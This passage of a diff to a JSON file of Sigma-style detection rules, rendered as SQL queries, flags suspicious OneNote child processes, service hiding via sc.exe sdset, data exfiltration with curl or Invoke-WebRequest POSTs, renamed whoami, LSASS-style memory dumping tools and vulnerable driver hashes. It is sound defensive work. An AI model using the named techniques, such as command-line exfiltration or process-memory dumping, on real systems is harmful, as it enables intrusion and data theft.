'%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "status": "test", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", "attack.t1543.003" ], "falsepositives": [ 
@@ -5668,99 +5500,95 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": 
"9bacc538-d1b9-4d42-862e-469eafc05a41", - "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" + 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' 
